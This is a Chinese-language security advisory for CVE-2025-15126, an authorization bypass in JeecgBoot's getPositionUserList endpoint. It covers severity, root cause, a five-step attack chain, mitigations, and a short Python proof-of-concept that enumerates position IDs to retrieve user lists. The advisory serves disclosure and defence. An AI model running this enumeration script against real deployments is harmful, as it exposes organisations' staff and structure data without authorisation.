CVE-2025-15126 JeecgBoot getPositionUserList接口权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-15126

漏洞类型

权限绕过

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JeecgBoot

漏洞概述

CVE-2025-15126是JeecgBoot企业级低代码平台中存在的一个权限绕过漏洞。该漏洞影响JeecgBoot版本至3.9.0，漏洞位于/sys/position/getPositionUserList接口的getPositionUserList函数中。攻击者可以通过构造恶意的positionId参数值来绕过正常的授权检查，获取本应无权限访问的用户列表信息。由于该漏洞利用复杂度较高，且需要低权限认证，但已被公开披露并可能出现利用代码，因此仍需引起重视。建议受影响用户尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞属于不正确的授权（Improper Authorization）问题。在JeecgBoot的/sys/position/getPositionUserList接口中，系统未能正确验证用户对特定岗位（position）下用户列表的访问权限。攻击者只需提供有效的positionId参数值，即可访问任意岗位关联的用户信息，而无需验证当前用户是否拥有该岗位的访问权限。漏洞的根本原因在于后端API在处理positionId参数时，未进行充分的权限校验逻辑。攻击者可以利用此漏洞枚举系统中的岗位信息，进而获取敏感的用户组织架构数据。该漏洞的CVSS评分为3.1（低危），攻击向量为网络形式，需要低权限认证，无需用户交互即可利用。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统使用的JeecgBoot版本（需<=3.9.0）

STEP 2

步骤2

攻击者访问/sys/position/getPositionUserList接口

STEP 3

步骤3

攻击者构造恶意的positionId参数值（枚举不同的ID）

STEP 4

步骤4

系统未正确验证用户权限，直接返回对应岗位的用户列表

STEP 5

步骤5

攻击者获取敏感的组织架构和用户信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15126 PoC - JeecgBoot Improper Authorization
# Target: JeecgBoot <= 3.9.0
# Endpoint: /sys/position/getPositionUserList

TARGET_URL = "http://target-server.com/jeecg-boot"
# Replace with actual position ID to enumerate
POSITION_ID = 1

def exploit_cve_2025_15126():
    """Exploit for improper authorization in getPositionUserList endpoint"""
    
    endpoint = f"{TARGET_URL}/sys/position/getPositionUserList"
    params = {
        "positionId": POSITION_ID
    }
    
    # Request with low-privilege or no authentication
    headers = {
        "Content-Type": "application/json"
    }
    
    try:
        response = requests.get(endpoint, params=params, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            if data.get("success"):
                print("[+] Authorization bypass successful!")
                print(f"[+] Retrieved user list for position ID: {POSITION_ID}")
                print(f"[+] Response: {data}")
                return True
        
        print("[-] Exploitation failed or patch already applied")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False

if __name__ == "__main__":
    exploit_cve_2025_15126()

影响范围

JeecgBoot <= 3.9.0

防御指南

临时缓解措施

如果无法立即升级，可通过配置Web应用防火墙（WAF）规则限制对/sys/position/getPositionUserList接口的访问，或在反向代理层实施基于JWT令牌的权限验证，确保用户只能访问其角色授权范围内的岗位数据。同时建议监控异常的用户列表查询行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15126
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15126
3 Details https://www.cvedetails.com/cve/CVE-2025-15126/
4 VulDB https://vuldb.com/cve/CVE-2025-15126
5 Link https://github.com/Hwwg/cve/issues/39
6 Link https://vuldb.com/?ctiid.338504
7 Link https://vuldb.com/?id.338504
8 Link https://vuldb.com/?submit.711782